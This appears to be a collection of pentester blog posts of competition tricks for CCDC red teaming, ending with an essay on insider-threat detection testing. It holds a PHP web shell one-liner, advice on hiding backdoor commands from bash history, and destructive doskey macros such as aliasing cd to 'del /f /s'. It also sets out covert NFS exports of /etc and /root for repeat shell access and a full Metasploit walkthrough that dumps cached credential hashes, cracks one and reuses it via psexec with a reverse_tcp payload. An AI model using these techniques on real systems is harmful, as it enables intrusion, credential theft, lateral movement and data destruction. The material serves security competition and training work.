This is mostly for my memory for CCDC

1

<?php system($_GET['cmd']); ?>

I wonder what will happen if a RSS reader doesn’t do proper filtering…

CORRECTION:

Thanks to jduck for pointing it out, but you need to actually make a change to get this to work, reference: http://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/ and search for: Modifying History Behavior

You simply put a space before it

1
2
3
4
5
6
7
8
9
10
11
12
13
14

mubix@localhost:/tmp/demo$ ls -alh
total 8.0K
drwxr-xr-x 2 mubix mubix 4.0K Mar  1 19:43 .
drwxrwxrwt 3 root  root  4.0K Mar  1 19:43 ..
-rw-r--r-- 1 mubix mubix    0 Mar  1 19:43 bob
mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$  mysecretlogin -u bobsuruncle -p allacazaam

mubix@localhost:/tmp/demo$ cat ~/.bash_history
ls -alh

mubix@localhost:/tmp/demo$

Works well for backdoors you don’t want caught via the .bash_history as well ;–)

More CCDC tricks as I think of them..

Not sure how far back it goes (Win95?) but 2000, XP and all the way up to Win 7 have a program called DOSKEY:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

C:\Users\vmadmin>doskey /?
Edits command lines, recalls Windows commands, and creates macros.

DOSKEY [/REINSTALL] [/LISTSIZE=size] [/MACROS[:ALL | :exename]]
  [/HISTORY] [/INSERT | /OVERSTRIKE] [/EXENAME=exename] [/MACROFILE=filename]
  [macroname=[text]]

  /REINSTALL          Installs a new copy of Doskey.
  /LISTSIZE=size      Sets size of command history buffer.
  /MACROS             Displays all Doskey macros.
  /MACROS:ALL         Displays all Doskey macros for all executables which have
                      Doskey macros.
  /MACROS:exename     Displays all Doskey macros for the given executable.
  /HISTORY            Displays all commands stored in memory.
  /INSERT             Specifies that new text you type is inserted in old text.
  /OVERSTRIKE         Specifies that new text overwrites old text.
  /EXENAME=exename    Specifies the executable.
  /MACROFILE=filename Specifies a file of macros to install.
  macroname           Specifies a name for a macro you create.
  text                Specifies commands you want to record.

UP and DOWN ARROWS recall commands; ESC clears command line; F7 displays
command history; ALT+F7 clears command history; F8 searches command
history; F9 selects a command by number; ALT+F10 clears macro definitions.

The following are some special codes in Doskey macro definitions:
$T     Command separator.  Allows multiple commands in a macro.
$1-$9  Batch parameters.  Equivalent to %1-%9 in batch programs.
$*     Symbol replaced by everything following macro name on command line.

Just like the Linux ‘alias’ command in some ways, you can remap pretty much any command you want. Here are some of the more evil ones I have used in the past:

• doskey cd=del /f /s $1
• doskey tasklist=cat tasklist.txt
• doskey dir=dir ……

I’m sure you can think of a ton more..

The great thing is that there isnt’ a /delete – you just have to know that in order to remove a doskey macro you just issue the command without the aliased part, so ‘doskey tasklist=’ will delete the tasklist macro.

Constant connections and odd binaries running on systems usually get caught pretty quickly in CCDC events. However, NFS exports are hardly ever noticed. Setting it up on an Ubuntu/Debian box is a snap and given the right directory and permissions can lead you right back to getting shell any time you want without a constant connection. Plus, NFS blends right in and can listen on TCP and/or UDP (2049)

Here is a quick how-to on setting up NFS

https://help.ubuntu.com/community/SettingUpNFSHowTo

I’m sure you can think of much more evil locations but /etc/, /var/www/, and /root/ are some of my favorite exports, but there is no reason why you couldn’t just export ‘/’ that I know of. (NFSd might not permit it)

Remember to change the NFS settings so that it runs as root and you are golden.

(No I’m not old enough to have used that term when it was the standard)

I believe that this tweet should be archived for reference:

http://twitter.com/#!/_ming_se/status/37688231185219584

And for those who don’t get the reference, here is a Pontiac Fiero:

The following are good adds to your DNS brute force list:

These are all SRV records so make sure your type is set correctly. The great thing about SRV records is that it tells you the port in the answer. Isn’t that nice of them?

I don’t know of any DNS tools that utilize SRV as part of their process, but scripting dig to do so isn’t tough.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

_autodiscover._tcp
_caldav._tcp
_client._smtp
_gc._tcp
_h323cs._tcp
_h323cs._udp
_h323ls._tcp
_h323ls._udp
_h323rs._tcp
_h323rs._tcp
_http._tcp
_iax.udp
_imap._tcp
_imaps._tcp
_jabber-client._tcp
_jabber._tcp
_kerberos-adm._tcp
_kerberos._tcp
_kerberos._tcp.dc._msdcs
_kerberos._udp
_kpasswd._tcp
_kpasswd._udp
_ldap._tcp
_ldap._tcp.dc._msdcs
_ldap._tcp.gc._msdcs
_ldap._tcp.pdc._msdcs
_msdcs
_mysqlsrv._tcp
_ntp._udp
_pop3._tcp
_pop3s._tcp
_sip._tcp
_sip._tls
_sip._udp
_sipfederationtls._tcp
_sipinternaltls._tcp
_sips._tcp
_smtp._tcp
_stun._tcp
_stun._udp
_tcp
_tls
_udp
_vlmcs._tcp
_vlmcs._udp
_wpad._tcp
_xmpp-client._tcp
_xmpp-server._tcp

Update: Cachedump has been added to the Metasploit trunk:

https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12946

Pull it down:

1

wget http://lab.mediaservice.net/code/cachedump.rb

put it here: /(metasploitdir)/modules/post/windows/gather

Load up console and pwn something then (MAKE SURE YOU ARE SYSTEM):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

meterpreter > run post/windows/gather/cachedump
[*] Executing module against WORKSTATION244
[*] Obtaining the boot key...
[*] Trying 'XP' style...
[*] Getting PolSecretEncryptionKey...
[*] XP compatible client
[*] Lsa Key: 29249a6480f428cb6dacba2d30d5292c
[*] Getting LK$KM...
[*] Dumping cached credentials...
Username  : jdoe
Hash  : 592cdfbc3f1ef77ae95c75f851e37166
Last login  : 2010-05-11 01:43:48
DNS Domain Name  : CONTOSO.CO
Effective Name  : jdo
Full Name  : eJane Do
User ID  : 1107
Primary Group ID  : 513
Additional groups  : 33620069 33554432 34013184
Logon domain name  : CONTOS
----------------------------------------------------------------------
 
[*] John the Ripper format:
jdoe:592cdfbc3f1ef77ae95c75f851e37166:CONTOSO.CO:CONTOS

[*] Hash are in MSCACHE format. (mscash)
meterpreter >

Crack it:

1
2
3
4

cat lab.dic | ./john --stdin lab.mscash --format=mscash --pot=lab.pot  
Loaded 1 password hash (M$ Cache Hash [Generic 1x])  
ASDqwe123  (jdoe)  
guesses: 1  time: 0:00:00:00  c/s: 500  trying: ASDqwe123

Use it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

meterpreter > background  
msf exploit(handler) > route add 10.10.10.0 255.255.255.0 1  
msf exploit(handler) > use exploit/windows/smb/psexec  
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp  
PAYLOAD => windows/meterpreter/reverse_tcp  
msf exploit(psexec) > set LHOST X.X.X.X  
LHOST => X.X.X.X  
msf exploit(psexec) > set LPORT 80  
LPORT => 80  
msf exploit(psexec) > set SMBDomain Contoso
SMBDomain => Contoso  
msf exploit(psexec) > set SMBUser jdoe  
SMBUser => jdoe  
msf exploit(psexec) > set SMBPass ASDqwe123  
SMBPass => ASDqwe123  
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name  Current Setting  Required  Description  
----  ---------------  --------  -----------  
RHOST  yes  The target address  
RPORT  445  yes  Set the SMB service port  
SMBDomain  Contoso  no  The Windows domain to use for authentication  
SMBPass  ASDqwe123  no  The password for the specified username  
SMBUser  jdoe  no  The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):


Name  Current Setting  Required  Description  
----  ---------------  --------  -----------  
EXITFUNC  process  yes  Exit technique: seh, thread, none, process  
LHOST  X.X.X.X  yes  The listen address  
LPORT  80  yes  The listen port


Exploit target:

Id  Name  
--  ----  
0  Automatic

 
msf exploit(psexec) > set RHOST 10.10.10.200  
RHOST => 10.10.10.200  
msf exploit(psexec) > exploit

[*] Started reverse handler on X.X.X.X:80  
[*] Connecting to the server...  
[*] Authenticating to 10.10.10.200:445|Contoso as user 'jdoe'...  
[*] Uploading payload...  
[*] Created jSlxARUj.exe...  
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[svcctl] ...  
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.200[svcctl] ...  
[*] Obtaining a service manager handle...  
[*] Creating a new service (SyHtwKpn - "MbEXNupOpYUL")...  
[*] Closing service handle...  
[*] Opening service...  
[*] Starting the service...  
[*] Removing the service...  
[*] Closing service handle...  
[*] Deleting jSlxARUj.exe...  
[*] Meterpreter session 2 opened (X.X.X.X:80 -> X.X.X.X:54430) at Mon Feb 14 22:23:00 +0000 2011

Woot ;–)

I thought updates went into RSS, but I guess they don’t so this is my “I updated stuff” post:

/blog/2009/9/18/password-word-lists/

Thought I would share this video, if it isn’t a swift kick in the pants to do better with your life I don’t what is:

This day and age everyone is worried about the insider threat. Internal Penetration Testing doesn’t really test what would happen if your janitor got paid 50 bucks to put a USB stick in one of your servers. External Penetration Tests are never scoped for that sort of testing. So what is a company to do? How can they know what the risk is? The answer? Usually they guess or assume. Mostly because they are scared to find out, it’s happened to them before, or one of a million different justifications. I’ve got a webinar coming up to describe exactly this type of testing, but I thought I’d go into it a bit here.

The FBI has a files upon files and stories stacked miles high about spies and insiders taking everything from accounting information (I could have put LIVES for effect but that’s more of a one-off) to staplers (no I don’t think Milton has an FBI file). Insiders throughout time have been the biggest threat to organizations even before sabotage and espionage became words. Ok, so what’s the big build up for? Simple. We need to build organizations up in the detection department from a pentesters point of view, not signature based. Our pentesters need to talk to our forensics guys, the incident responders need to talk to pentesters and every which way between. We are loosing this battle, and one of the reasons we are is we keep our bag of tricks to our selves, and that’s what insider threat testing is all about, getting all the tricks tested in a more open fashion.

Can your organization see a command and control session via IRC? What if it’s pushed over port 80? What about a standard meterpreter reverse_tcp connection? There isn’t a money based solution for this, just like there isn’t for phishing. Added on to all of the other things your security team does, there needs to be an employee, or a consultant that it is on the phone with your team saying “did you see this?”. Sort of like the ‘Can you hear me now?’ test. I mean, have you ever met an incident response team that took time out of their day to see if they could get poison ivy (one of the most well known RATS /remote access tools/) through the firewall undetected? Probably, but when they came and told you about it you chastised them for it.

In any case, I’ve jumped around roles in this post a lot and I want to focus it back on getting true collaborative testing done, but there has to be a balance. If you’re staring at a piece of earth, you’ll see the ant walk on by, but you’ll probably miss a half dozen of them on your way to check the mail. So how do you do this? Why not make it an educational process? Have the senior staff on the phone with the tester, and then tell the junior guys something like “We just had a breach and it’s starting exfil data to this IP: x.x.x.x”. Give them a chance to find it then work through with them where / what happened, and why or why not any alerts or alarms went of and if they saw it in their normal flow. Ideally they spot it before the senior staff even mention it.

No, this will not fit into the ‘I give you report you give me money’ scenario. Companies should consider it a training exercise where they get instant and obvious benefit.

There are many other arenas this helps in too. For example phishing, you know how much harder it will be for an attacker to get a payload to work if you’ve already tested, detected and have traps (we’ll go into setting traps another time) for all the public avenues of C&C and exfiltration? They will get frustrated, and you’ll know that you’re being attacked. A proactive stance is what ‘testing’ is all about, and this is a extremely neglected aspect of it.

No one will solve ‘security’, all we are here to do is minimize the attack surface.

Come to the webinar to heckle, learn, or just hear more, or don’t. I just wanted to get this out there and ask the question: Can your most important data leave on a fake Lady Gaga CD without you knowing?

Update: Let me squash something real quick. No this is not a new idea. The prevention side is talked about ad nauseum, but hardly anyone talks about testing to see what could really happen.